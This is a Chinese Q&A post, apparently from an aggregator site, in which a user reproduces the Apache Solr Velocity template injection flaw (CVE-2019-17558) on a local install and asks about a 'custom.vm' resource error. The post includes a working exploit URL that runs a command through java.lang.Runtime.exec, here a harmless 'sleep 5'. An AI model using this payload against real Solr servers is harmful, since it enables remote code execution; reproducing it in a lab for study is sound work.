问题描述
我下载了solr 8.2.0并执行了一系列步骤。他们是:
cat README.txt
bin/solr create -c test
bin/solr start
访问了该网址:http://127.0.0.1:8983/solr/test/select?q=hi
#works http://127.0.0.1:8983/solr/test/select?q=hi&&wt=velocity&&v.template=custom&v.template.custom=$class.inspect(%22java.lang.Runtime%22).type.getRuntime().exec(%22sleep%205%22).waitFor()
#它引发错误。
我正在关注此https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability或更具体地说是此https://www.tenable.com/sites/drupal.dmz.tenablesecurity.com/files/images/blog/solr-rce-web.gif ..我认为这可能会导致5秒的延迟。
但是,我遇到{msg=Unable to find resource 'custom.vm',trace=java.io.IOException: Unable to find resource 'custom.vm'
错误。该图片Error中充分显示了该错误。无论如何找到解决此错误的方法?
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)